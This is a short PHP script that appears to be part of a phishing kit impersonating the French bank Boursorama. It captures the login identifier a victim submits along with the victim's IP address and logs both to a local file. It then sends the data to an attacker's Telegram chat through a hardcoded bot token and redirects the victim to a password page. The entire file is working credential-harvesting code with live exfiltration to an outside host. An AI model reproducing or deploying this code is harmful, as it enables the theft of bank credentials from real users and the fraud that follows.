<?php
ob_start();
session_start();

$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
if(isset($_POST['identifiant'])){

$_SESSION['identifiant'] = $_POST['identifiant'];

$message  = "=========[ Bourso INFO ]=========\n";
$message .= "identifiant  : ".$_POST['identifiant']."\n";
$message .= "===============[IP]==============\n";
$message .= "IP : http://www.geoiptool.com/?IP=$ip\n";
$message .= "==========[ Bourso  INFO]=========";
$fh = fopen('XXD.txt' ,'a');
fwrite($fh, ' '."".$message ."\n\n");
fclose($fh);
        $token = "6384881610:AAFCma01A350PHgZD4PsMnZXiDisgHADguw";
    file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=-4263630620&text=" . urlencode($message)."" );
header("Location:./pass.php");
}else{
header("Location:./pass.php");
}

?>
